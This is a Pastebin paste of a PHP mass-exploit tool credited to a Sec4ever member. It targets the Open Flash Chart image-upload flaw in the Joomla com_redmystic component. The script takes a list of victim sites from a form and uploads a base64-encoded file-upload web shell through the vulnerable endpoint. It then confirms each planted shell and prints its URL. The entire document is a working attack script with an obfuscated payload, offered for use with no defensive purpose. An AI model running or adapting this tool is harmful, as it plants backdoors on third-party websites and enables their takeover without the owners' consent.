RokiAdhytama

com_redmsytic by JackWilder

Nov 19th, 2019
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.31 KB | None | 0 0
  1. <form method='POST'>
  2. <input type='text' name='name' value='p.php'>
  3. <input type='submit' value='Exploit' name='exploit'><br>
  4. <textarea name='sites' cols='45' rows='15'>Here Sites ;)</textarea>
  5. </form>
  6. <?
  7. /*
  8. # Coded By : xSecurity
  9. # Homepage : sec4ever.com - is-sec.com
  10. # GreetsTo : b0x - Mr.Dm4r - Lov3rDNS - RAB3OUN - r0kin - Shark Hidden - DeeF - DamaneDz - b0y h4ck - All Sec4ever Member'z
  11. # Scanning : [ com_civicrm , com_acymailing , com_jnewsletter , com_jinc , com_maianmedia , com_jnews ]
  12. */
  13. @set_time_limit(0);
  14. $site = explode("\r\n", $_POST['sites']);
  15. $filename = $_POST['name'];
  16. $path = array('/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php');
  17.  
  18. $name = array("/administrator/components/com_redmystic/chart/tmp-upload-images/");
  19.  
  20. $uploader = base64_decode("PD9waHAKZWNobyAnPHRpdGxlPlVwbG9hZCBGaWxlcyB4U2VjdXJpdHkgfCBTZWM0ZXZlci5Db008L3RpdGxlPic7CmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11
  21. bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOwppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7CglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgQ29tcGxhdGUgISEhPC9iPjxicj48YnI+JzsgfQoJZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQgISEhPC9iPjxicj48YnI+JzsgfQp9Cj8+");
  22.  
  23. $options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plain\r\n", 'content'=> $uploader));
  24. $context = stream_context_create($options);
  25.  
  26. if($_POST['exploit'])
  27. {
  28. foreach($site as $sites)
  29. {
  30. foreach($path as $upload)
  31. {
  32. $fopen = @fopen("{$sites}{$upload}?name={$filename}", 'r', false, $context);
  33. }
  34. foreach($name as $names)
  35. {
  36. $url = "{$sites}{$names}{$filename}";
  37. $check = @file_get_contents($url);
  38. if(eregi("Sec4ever.CoM", $check))
  39. {
  40. echo "<font face='Tahoma' size='2'>[+] Exploit Complete => {$sites}/{$names}/{$filename} <br />";
  41. flush();
  42. }
  43. }
  44. }
  45. }
  46. echo "<font face='Tahoma' size='2'>[+] Coded By xSecurity => Sec4ever.CoM - is-sec.com <br> 4U : b0x - Mr.Dm4r - Lov3rDNS - RAB3OUN - r0kin - Shark Hidden - DeeF - DamaneDz - b0y h4ck - All Sec4ever Member'z</font>";
  47. ?>
Add Comment
Please, Sign In to add comment